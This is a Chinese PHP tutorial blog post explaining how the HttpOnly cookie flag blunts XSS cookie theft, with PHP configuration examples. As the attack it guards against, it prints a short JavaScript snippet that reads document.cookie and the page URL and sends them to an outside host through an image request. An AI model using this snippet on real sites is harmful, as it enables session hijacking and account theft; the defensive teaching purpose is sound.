编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP4.04简明安装

Oct 09 PHP

dedecms中显示数字验证码的修改方法

Mar 21 PHP

php实现从ftp服务器上下载文件树到本地电脑的程序

Feb 10 PHP

九个你必须知道而且又很好用的php函数和特点

Aug 08 PHP

php检测iis环境是否支持htaccess的方法

Feb 18 PHP

PHP实现支持GET,POST,Multipart/form-data的HTTP请求类

Sep 24 PHP

php 伪造ip以及url来路信息方法汇总

Nov 25 PHP

php使用unset()删除数组中某个单元（键）的方法

Feb 17 PHP

详解WordPress中添加和执行动作的函数使用方法

Dec 29 PHP

PHP实现对图片的反色处理功能【测试可用】

Feb 01 PHP

PHPExcel 修改已存在Excel的方法

May 03 PHP

PHP实现提取多维数组指定一列的方法总结

Dec 04 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP